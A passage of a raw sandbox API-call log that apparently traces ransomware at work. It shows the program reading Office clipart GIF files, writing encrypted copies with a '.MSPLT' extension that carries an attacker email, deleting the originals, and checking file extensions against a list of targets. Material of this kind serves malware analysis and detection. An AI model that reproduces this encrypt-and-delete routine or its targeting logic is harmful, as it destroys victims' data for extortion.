lpNumberOfBytesRead=0x2aefecc*=0x1a1c, lpOverlapped=0x0) returned 1 [0184.373] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x1a20, lpOverlapped=0x0) returned 1 [0184.374] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0184.374] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0184.374] SetEndOfFile (hFile=0x378) returned 1 [0184.375] CloseHandle (hObject=0x378) returned 1 [0184.376] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.376] SetEndOfFile (hFile=0x384) returned 1 [0184.377] CloseHandle (hObject=0x384) returned 1 [0184.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0184.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0184.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.843] lstrlenW (lpString=".doc") returned 4 [0184.843] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0184.843] lstrlenW (lpString=".docx") returned 5 [0184.843] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0184.843] lstrlenW (lpString=".pdf") returned 4 [0184.843] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0184.843] lstrlenW (lpString=".xls") returned 4 [0184.844] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0184.844] lstrlenW (lpString=".xlsx") returned 5 [0184.844] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0184.844] lstrlenW (lpString=".ppt") returned 4 [0184.844] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0184.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.844] lstrlenW (lpString=".zip") returned 4 [0184.844] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.844] lstrlenW (lpString=".rar") returned 4 [0184.844] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.844] lstrlenW (lpString=".bz2") returned 4 [0184.844] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0184.844] lstrlenW (lpString=".7z") returned 3 [0184.844] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0184.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.844] lstrlenW (lpString=".dbf") returned 4 [0184.844] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.844] lstrlenW (lpString=".1cd") returned 4 [0184.844] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0184.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.844] lstrlenW (lpString=".jpg") returned 4 [0184.844] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0184.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.844] lstrlenW (lpString=".doc") returned 4 [0184.845] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0184.845] lstrlenW (lpString=".docx") returned 5 [0184.845] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0184.845] lstrlenW (lpString=".pdf") returned 4 [0184.845] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0184.845] lstrlenW (lpString=".xls") returned 4 [0184.845] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0184.845] lstrlenW (lpString=".xlsx") returned 5 [0184.845] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0184.845] lstrlenW (lpString=".ppt") returned 4 [0184.845] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0184.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.845] lstrlenW (lpString=".zip") returned 4 [0184.845] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.845] lstrlenW (lpString=".rar") returned 4 [0184.845] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.845] lstrlenW (lpString=".bz2") returned 4 [0184.845] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0184.845] lstrlenW (lpString=".7z") returned 3 [0184.845] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0184.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.845] lstrlenW (lpString=".dbf") returned 4 [0184.845] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.845] lstrlenW (lpString=".1cd") returned 4 [0184.845] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0184.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0184.846] lstrlenW (lpString=".jpg") returned 4 [0184.846] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0184.846] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0184.846] lstrlenW (lpString="AG00040_.GIF") returned 12 [0184.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.308] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=8097) returned 1 [0185.308] CloseHandle (hObject=0x358) returned 1 [0185.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 0x220 [0185.309] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.309] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.309] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0185.310] GetLastError () returned 0x0 [0185.310] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1fa1, lpOverlapped=0x0) returned 1 [0185.322] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x1fb0, lpOverlapped=0x0) returned 1 [0185.324] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0185.324] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0185.324] SetEndOfFile (hFile=0x2fc) returned 1 [0185.324] CloseHandle (hObject=0x2fc) returned 1 [0185.325] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.325] SetEndOfFile (hFile=0x358) returned 1 [0185.327] CloseHandle (hObject=0x358) returned 1 [0185.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.327] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0185.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.328] lstrlenW (lpString=".doc") returned 4 [0185.328] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.328] lstrlenW (lpString=".docx") returned 5 [0185.328] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.328] lstrlenW (lpString=".pdf") returned 4 [0185.328] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.328] lstrlenW (lpString=".xls") returned 4 [0185.329] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.329] lstrlenW (lpString=".xlsx") returned 5 [0185.329] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.329] lstrlenW (lpString=".ppt") returned 4 [0185.329] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.329] lstrlenW (lpString=".zip") returned 4 [0185.329] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.329] lstrlenW (lpString=".rar") returned 4 [0185.329] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.329] lstrlenW (lpString=".bz2") returned 4 [0185.329] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.329] lstrlenW (lpString=".7z") returned 3 [0185.329] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.329] lstrlenW (lpString=".dbf") returned 4 [0185.329] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.329] lstrlenW (lpString=".1cd") returned 4 [0185.329] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.329] lstrlenW (lpString=".jpg") returned 4 [0185.329] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.329] lstrlenW (lpString=".doc") returned 4 [0185.329] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.329] lstrlenW (lpString=".docx") returned 5 [0185.330] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.330] lstrlenW (lpString=".pdf") returned 4 [0185.330] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.330] lstrlenW (lpString=".xls") returned 4 [0185.330] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.330] lstrlenW (lpString=".xlsx") returned 5 [0185.330] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.330] lstrlenW (lpString=".ppt") returned 4 [0185.330] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.330] lstrlenW (lpString=".zip") returned 4 [0185.330] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.330] lstrlenW (lpString=".rar") returned 4 [0185.330] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.330] lstrlenW (lpString=".bz2") returned 4 [0185.330] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.330] lstrlenW (lpString=".7z") returned 3 [0185.330] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.330] lstrlenW (lpString=".dbf") returned 4 [0185.330] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.330] lstrlenW (lpString=".1cd") returned 4 [0185.330] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 68 [0185.330] lstrlenW (lpString=".jpg") returned 4 [0185.330] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.331] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.331] lstrlenW (lpString="AG00057_.GIF") returned 12 [0185.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0185.342] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=11891) returned 1 [0185.342] CloseHandle (hObject=0x2fc) returned 1 [0185.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 0x220 [0185.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0185.345] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.345] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.346] GetLastError () returned 0x0 [0185.346] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x2e73, lpOverlapped=0x0) returned 1 [0185.363] WriteFile (in: hFile=0x350, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x2e80, lpOverlapped=0x0) returned 1 [0185.364] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0185.364] WriteFile (in: hFile=0x350, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0185.365] SetEndOfFile (hFile=0x350) returned 1 [0185.365] CloseHandle (hObject=0x350) returned 1 [0185.746] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.746] SetEndOfFile (hFile=0x384) returned 1 [0185.763] CloseHandle (hObject=0x384) returned 1 [0185.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0185.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.764] lstrlenW (lpString=".doc") returned 4 [0185.764] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.764] lstrlenW (lpString=".docx") returned 5 [0185.764] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.764] lstrlenW (lpString=".pdf") returned 4 [0185.764] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.764] lstrlenW (lpString=".xls") returned 4 [0185.764] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.764] lstrlenW (lpString=".xlsx") returned 5 [0185.764] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.764] lstrlenW (lpString=".ppt") returned 4 [0185.764] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.764] lstrlenW (lpString=".zip") returned 4 [0185.764] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.764] lstrlenW (lpString=".rar") returned 4 [0185.764] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.764] lstrlenW (lpString=".bz2") returned 4 [0185.764] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.764] lstrlenW (lpString=".7z") returned 3 [0185.765] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.765] lstrlenW (lpString=".dbf") returned 4 [0185.765] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.765] lstrlenW (lpString=".1cd") returned 4 [0185.765] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.765] lstrlenW (lpString=".jpg") returned 4 [0185.765] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.765] lstrlenW (lpString=".doc") returned 4 [0185.765] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.765] lstrlenW (lpString=".docx") returned 5 [0185.765] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.765] lstrlenW (lpString=".pdf") returned 4 [0185.765] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.765] lstrlenW (lpString=".xls") returned 4 [0185.765] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.765] lstrlenW (lpString=".xlsx") returned 5 [0185.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.765] lstrlenW (lpString=".ppt") returned 4 [0185.765] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.765] lstrlenW (lpString=".zip") returned 4 [0185.765] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.765] lstrlenW (lpString=".rar") returned 4 [0185.765] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.766] lstrlenW (lpString=".bz2") returned 4 [0185.766] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.766] lstrlenW (lpString=".7z") returned 3 [0185.766] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.766] lstrlenW (lpString=".dbf") returned 4 [0185.766] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.766] lstrlenW (lpString=".1cd") returned 4 [0185.766] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0185.766] lstrlenW (lpString=".jpg") returned 4 [0185.766] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.766] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.766] lstrlenW (lpString="AG00120_.GIF") returned 12 [0185.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0185.767] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=3484) returned 1 [0185.767] CloseHandle (hObject=0x384) returned 1 [0185.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 0x220 [0185.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0185.767] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.767] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.768] GetLastError () returned 0x0 [0185.768] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0xd9c, lpOverlapped=0x0) returned 1 [0185.805] WriteFile (in: hFile=0x350, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xda0, lpOverlapped=0x0) returned 1 